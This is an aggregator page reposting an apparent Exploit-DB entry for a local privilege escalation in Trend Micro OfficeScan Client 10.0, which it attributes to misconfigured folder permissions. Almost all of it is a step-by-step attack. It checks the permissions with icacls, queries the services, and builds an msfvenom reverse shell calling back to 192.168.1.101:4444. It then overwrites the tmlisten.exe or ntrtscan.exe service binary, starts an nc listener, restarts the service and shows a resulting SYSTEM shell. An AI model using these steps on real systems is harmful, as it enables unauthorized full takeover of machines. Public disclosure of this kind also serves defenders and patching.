4
[local] Trend Micro OfficeScan Client 10.0 - ACL Service LPE
source link: https://www.exploit-db.com/exploits/51453
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE
# Date: 2023/05/04
# Exploit Author: msd0pe
# Vendor Homepage: https://www.trendmicro.com
# My Github: https://github.com/msd0pe-1
Trend Micro OfficeScan Client:
Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access.
[1] Verify the folder rights:
> icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"
C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
NT SERVICE\TrustedInstaller:(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
BUILTIN\Administrators:(F)
BUILTIN\Administrators:(OI)(CI)(IO)(F)
BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
CREATOR OWNER:(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)
[2] Get informations about the services:
> sc qc tmlisten
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: tmlisten
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OfficeScan NT Listener
DEPENDENCIES : Netman
: WinMgmt
SERVICE_START_NAME : LocalSystem
OR
> sc qc ntrtscan
SERVICE_NAME: ntrtscan
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : OfficeScan NT RealTime Scan
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
[3] Generate a reverse shell:
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe
OR
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe
[4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe
[5] Start listener
> nc -lvp 4444
[6] Reboot the service/server
> sc stop tmlisten
> sc start tmlisten
OR
> sc stop ntrtscan
> sc start ntrtscan
OR
> shutdown /r
[7] Enjoy !
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK